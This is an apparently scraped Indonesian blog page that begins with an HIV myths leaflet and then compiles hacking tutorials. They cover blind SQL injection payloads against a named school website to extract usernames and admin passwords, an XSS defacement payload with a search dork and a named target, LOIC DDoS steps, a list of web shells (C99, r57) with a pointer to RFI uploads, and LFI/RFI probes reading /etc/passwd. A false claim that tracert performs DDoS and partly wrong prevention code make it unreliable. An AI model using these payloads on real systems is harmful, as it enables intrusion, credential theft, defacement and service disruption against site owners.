Untuk mengawalinya, saya akan anggapan yang salah mengenai HIV. Psti kalian tahu HIV kan ? Penyakit yang sampai saat ini bahkan belum ditemukan obatnya. Nah, penderita HIV pasti sedih dan menderita kan ? Jika kita punya sahabat yang terserang HIV (mudah-mudahan tidak), jangan malah dijauhi. Beri dia semangat agar tetap ceria. Kebanyakan orang menjauhi penderita HIV karena anggapan tentang HIV yang salah kaprah. Apa saja itu ?

1. Keringat - Menempelnya keringat pengidap HIV Positif pada orang sehat TIDAK AKAN menularkan penyakit tersebut. HIV tidak terdapat pada keringat.


2. Saliva/liur - 100% TIDAK MENULARKAN HIV !


3. Bersin dan Batuk - Sama dengan air liur, cairan hidung bukanlah media penyaluran HIV, ASALKAN TIDAK MENGANDUNG DARAH


4. Menggunakan WC/Toilet - Menggunakan WC yang sama dengan pengidap HIV tidak menyebabkan tertular HIV karena kotoran dan air seni tidak menularkan HIV


5. Makan dengan Alat Makan yang sama - hal ini tidak akan menularkan HIV karena sekali lagi air liur tidak membawa virus HIV


6. Berenang bersama - Tidak menimbulkan HIV
   
   
   
   


7. 
   Gigitan Serangga dan Lainnya - Hal ini tidak akan menularkan HIV. Nyamuk hanya liurnya dalam tubuh yang berupa bentol, nyamuk TIDAK menginjeksi darah yang sudah dihisap ke tubuh lain
   
   
   
   
   
   
   

HIV bukanlah Virus yang hidup di udara, air, kotoran/tinja, ataupun air seni. HIV tidak akan lama bertahan hidup diluar tubuh manusia. Oleh karena itu, hubungan sosial yang normal dengan pengidap HIV tidak akan menyebabkan kita tertular HIV. INGAT, HIV MENYEBAR MELALUI CAIRAN TUBUH YAITU : DARAH, CAIRAN KELAMIN, ASI. Jadi tidak semua cairan tubuh membawa HIV.

*Sumber : Brosur dari SMAN 2 Bangkalan

Blind SQL Injection

Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...

 Apa sich Blind SQL Injection tu?



Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

Sumber : Hacker Newbie

Cara Deface Website Menggunakan Teknik XSS Vulnerability

Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4). Kemudian tekan Enter.

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.

Source: Hacker Newbie

DDoS Dengan Tool LOIC

Setelah sebelumnya saya sempat share Tutorial DDoS dengan tools HOIC, kali ini saya akan share tools yang tidak kalah keren. LOIC, Low Orbit Ion Cannon. Tools ini hampir sama dengan HOIC, dan kualitasnya juga bisa dibilang sama. Jadi terserah kalian mau pake yang HOIC atau LOIC. Atau mau pake kedua-duanya. :v

Langkah - langkah :

Pada kolom URL, isi dengan url target lalu klik LOCK ON.

Begitu juga dengan IP, Port, Dan Method [Untuk mengetahui IP dan Port target, bisa discan di IP Scanner online. Cari aja di Google]

Setelah semuanya diisi, klik IMMA CHARGIN MAH LAZER.

Tunggu sampai target down. Target down jika angka di Attack Status - Failed menjadi besar/banyak.



Untuk mendownload, klik link dibawah ini :

Download LOIC



Tools untuk ddos, download tools ddos loic

Cara Mudah DDoS Dengan Command Prompt

Kali ini saya akan share cara mudah melakukan serangan DDoS dengan Command Prompt [CMD] . Apa itu DDoS ? Kalo ada yang belum tau tanya aja ke Mbah Google. Oke, langsung saja saya mulai tutorialnya.

Yang diperlukan untuk melakukan DDoS adalah Komputer dan Internet.

Berikut langkah-langkah melakukan serangan DDoS dengan Command Prompt :



1. Hidupkan komputer. [ ya iya lah.... ]

2. Sambung ke internet. [ sudah pasti ]

3. Buka CMD [ klik tombol Home+R . Tulis CMD. Lalu tekan ENTER ]

4. Masukkan perintah berikut : tracert www.target.com . www.target.com silahkan diganti dengan alamat yang ingin kita DDoS. Ex : www.myanmar.com

5. Tekan ENTER

Sekarang proses DDoS sedang berjalan. Jangan di close CMD nya sampai target down. Kalo males liat penampakan CMD, minimize Command Prompt nya. Terus buka bok*p dah. Hahahahaha. Bercanda kok. Intinya, jangan diclose Command Prompt nya.



Ingat, proses DDoS membutuhkan kekompakan. Jadi jangan lakukan DDoS sendirian. Ajaklah teman-teman anda dan lakukan secara bersama-sama.

Apa itu Web Shell ?

Dalam artikel saya kali ini, saya akan menerangkan sedikit tentang apa itu Web Shell. Sebenarnya saya sudah sering dengar hal ini sejak dulu, tapi baru sekarang saya mempelajarinya, dan baru sempat posting saat ini.

Web Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.

Untuk setiap web shell akan berbeda-beda, sesuai dengan Web Server yang dipakai. Misal jika server menggunakan Apache (biasanya PHP), maka webShell dalam berntuk PHP Script, begitu pula dengan ASP, PERL, CGI, dll.

Kali ini saya tidak akan menunjukan, bagaimana cara memasukan webShell tersebut ke server yang mau dihack. Saya disini hanya akan mencobanya pada server sendiri, dan untuk melihat, seberapa besarkah efek yang ditimbulkan C99 ini.
Jika anda tertarik untuk bisa mengUpload webShell ini pada server korban, maka anda bisa menggunakan tehnik RFI ( Remote File Inclusion), yang tentunya anda tinggal mencari saja tutorialnya di Google.
Tested Web Shell,

• b374k
• dQ99-shell
• c99
• r57
• phpShell
• itsecteam-shell
• Bypass
• safeOver
• phpShell
• itsecteam-shell

Un-Tested Web Shell,

• Tyrag-Bypass
• c100
• ASPx
• CMD-aspshell
• CWShell-Dumper
• CGI-Shell

Sesudah itu taruh file tersebut dalam Direktori Web Server anda dalam format PHP/ASP/CGI, sesuaikan dengan tipe webShell. Dan kunjungi melalui webBrowser, misalnya seperti berikut.

http://www.sitetarget.com/c99.php

Berikut beberapa screen shoot dari web shell tersebut,

 

[ C99 from Russia ]

 

[ ANI SHELL from India ]

 

[ B374k 2.1 from Indonesia ]

 

[ ZACO WebShell support POST Method ]

Tutor singkat RFI & LFI

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Code:

include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:

<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:

http://www.[target].com/index.php?imagefile=image.php

maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

Code:

Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.

Sumber: Hacker Newbie